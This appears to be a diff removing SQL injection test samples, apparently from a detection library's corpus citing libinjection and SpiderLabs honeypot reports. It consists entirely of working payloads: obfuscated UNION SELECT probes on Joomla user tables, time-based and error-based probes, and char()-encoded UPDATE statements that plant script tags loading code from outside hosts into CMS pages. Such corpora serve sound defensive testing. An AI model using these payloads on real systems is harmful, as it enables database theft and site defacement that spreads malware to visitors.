/*!911111*//*!0*/union select table_name x from information_schema.tables limit 1
-1.for update union select table_name from information_schema.tables limit 1
-0b01 union select table_name from information_schema.tables limit 1
1<binary 1>2 union select table_name from information_schema.tables limit 1
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1



@ -1,24 +0,0 @@
#
# http://blog.spiderlabs.com/2011/12/honeypot-alert-sql-injection-scanning-update-filter-evasions-detected.html
#
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users--
35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--


@ -1,12 +0,0 @@
#
# http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html
#
21+update+Categories+set+Category_Title=cast(Category_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Content+set+Content_Title=cast(Content_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Homepage+set+Homepage_Title=cast(Homepage_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--


@ -1,100 +0,0 @@
# https://github.com/client9/libinjection/issues/109
#
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))# YxEq
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- TscQ
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))# cDdL
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- DIOu
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))FsPL)
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(45=28,0,5)))))vxEi)
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6715=6715,0,5)))))Hfle) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6958>6957,0,5)))))sets)
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ZBav"="ZBav
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ekgZ" LIKE "ekgZ
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ikjC
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "AinJ"="AinJ
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "ULyg" LIKE "ULyg
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- qLff
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("ReEg" LIKE "ReEg
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("SiLv"="SiLv
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("QwEf"="QwEf
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("acRz" LIKE "acRz
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("RJVy" LIKE "RJVy
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("rTWb"="rTWb
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("AWGS" LIKE "AWGS
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("ObjI"="ObjI
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("SgCv" LIKE "SgCv
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("vYkA"="vYkA
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("TAfM"="TAfM
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("YVzA" LIKE "YVzA
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("XwuG"="XwuG
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("tENF" LIKE "tENF
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("fLDW" LIKE "fLDW
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("lEki"="lEki
"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("enRJ" LIKE "enRJ
1"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("zhFB"="zhFB
1%" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "%"="
1%" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "%"="
1%") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("%"="
1%") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("%"="
1%") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("%"="
1%")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("%"="
1%")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("%"="
1%")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("%"="
1%"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("%"="
1%"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("%"="
1%"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("%"="
1%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND '%'='
1%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND '%'='
1%') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('%'='
1%') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('%'='
1%') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('%'='
1%')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('%'='
1%')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('%'='
1%')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('%'='
1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('%'='
1%'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('%'='
1%'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('%'='
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eLVs'='eLVs
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eVVr' LIKE 'eVVr
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- OiYW
1' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)#
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2270=3285) THEN 1 ELSE 0x28 END))#
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (7449=7449) THEN 1 ELSE 0x28 END))#
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'BiBK' LIKE 'BiBK
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'PqYc'='PqYc
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- WaOc
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('bgJB'='bgJB
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('nPXQ' LIKE 'nPXQ
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ahKA
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('MTGN'='MTGN
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('UTnW' LIKE 'UTnW
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- jjec
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('apRZ'='apRZ
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('uTOg' LIKE 'uTOg
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- zMbs
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('BQCu' LIKE 'BQCu
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('dmjR'='dmjR
